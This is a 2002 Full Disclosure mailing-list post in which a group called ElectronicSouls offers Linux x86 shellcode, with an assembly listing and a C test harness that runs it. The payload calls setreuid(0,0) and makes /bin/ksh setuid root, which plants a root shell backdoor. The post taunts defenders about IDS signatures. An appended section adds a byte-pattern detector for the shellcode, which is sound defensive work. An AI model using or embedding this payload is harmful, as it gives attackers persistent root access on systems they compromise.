Full Disclosure mailing list archives
[ElectronicSouls] - Deadly Shellcode
From: es () hush com
Date: Fri, 29 Nov 2002 09:31:36 -0800
-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Our shellcoding genius has provided us with yet another 0day shellcode.
Please do not make IDS signatures for this, then replay your network traffic
through Snort to catch us!

# cat chmod-ksh.c
/* (C) Steele [ElectronicSouls] */

/***************************************
 *  xor ebx, ebx                       *
 *  mov ecx, ebx                       *
 *  mov al, 0x46                       *
 *  int 0x80                           *
 *                                     *
 *  mov al, 0x0f                       *
 *  push ebx                           *
 *  push dword 0x68736b2f              *
 *  push dword 0x6e69622f              *
 *  mov ebx, esp                       *
 *  mov cx, 0x9ed                      *
 *  int 0x80                           *
 ***************************************
 *  since bash has a cold heart        *
 ***************************************
 *  roc-a-steele                       *
 ***************************************/

#define DID_YOU_KNOW "that this code does setreuid(0,0)"\
                     "then does chmod("/bin/ksh", 4755);"

unsigned char shellcode[] =
"\x31\xdb"
"\x89\xd9"
"\xb0\x46"
"\xcd\x80"
"\xb0\x0f"
"\x53"
"\x68\x2f\x6b\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x66\xb9\xed\x09"
"\xcd\x80";

int
main()
{
    /* modified from lamagra's execute chroot shellcode */
    int (*funct)();
    funct = (int (*)()) shellcode;
    printf("size = %d\n",strlen(shellcode));
    (int)(*funct)();
}
#

The Electronic Souls Crew
[Electronicsouls] (c) 2002

"The game of go is complex."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3npIsMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltzjYAn1S5/lZt5LGK
oh066BNZmnT2AWZpAJ9eg0QVkUWsE3PfCfWpfEMOUzDCLw==
=6TaJ
-----END PGP SIGNATURE-----
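The post's remark about IDS signatures, seen from the defender's side: the following is an added example, not part of the original message, that scans a payload buffer for the two path pushes followed closely by the chmod mode load and syscall. The names detect_chmod_ksh and find_in, the WINDOW value and both sample buffers are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Byte patterns copied from the shellcode[] array in the post. */
static const unsigned char PUSH_PATH[] = {   /* push "/ksh"; push "/bin" */
    0x68, 0x2f, 0x6b, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e };
static const unsigned char MODE_INT[] = {    /* mov cx, 0x9ed (04755); int 0x80 */
    0x66, 0xb9, 0xed, 0x09, 0xcd, 0x80 };
#define WINDOW 16  /* assumed slack between the patterns, like Snort's "within" */

/* Constructed sample: four filler bytes followed by the posted bytes. */
const unsigned char SAMPLE_HIT[] = {
    'A','A','A','A', 0x31,0xdb,0x89,0xd9,0xb0,0x46,0xcd,0x80,0xb0,0x0f,0x53,
    0x68,0x2f,0x6b,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,
    0x66,0xb9,0xed,0x09,0xcd,0x80 };
/* Constructed benign sample: the path as plain text must not match. */
const unsigned char SAMPLE_TEXT[] = "GET /bin/ksh HTTP/1.0\r\n";

/* Offset of pat inside buf[from .. from+span), or -1 if it does not occur. */
static long find_in(const unsigned char *buf, size_t len, size_t from,
                    size_t span, const unsigned char *pat, size_t plen)
{
    size_t end = (span > len - from) ? len : from + span;
    for (size_t i = from; i + plen <= end; i++)
        if (memcmp(buf + i, pat, plen) == 0)
            return (long)i;
    return -1;
}

/* Hypothetical detector: offset of the path pushes, or -1 if no match. */
long detect_chmod_ksh(const unsigned char *buf, size_t len)
{
    long hit;
    for (size_t pos = 0; pos < len; pos = (size_t)hit + 1) {
        hit = find_in(buf, len, pos, len - pos, PUSH_PATH, sizeof PUSH_PATH);
        if (hit < 0)
            break;
        /* Require the mode load and syscall shortly after the pushes. */
        if (find_in(buf, len, (size_t)hit + sizeof PUSH_PATH, WINDOW,
                    MODE_INT, sizeof MODE_INT) >= 0)
            return hit;
    }
    return -1;
}

int main(void)
{
    printf("hit=%ld text=%ld\n", detect_chmod_ksh(SAMPLE_HIT, sizeof SAMPLE_HIT),
           detect_chmod_ksh(SAMPLE_TEXT, sizeof SAMPLE_TEXT));
    return 0;
}
```

Matching on the opcode-plus-operand bytes rather than on the string "/bin/ksh" is what keeps the plain-text request from triggering the check.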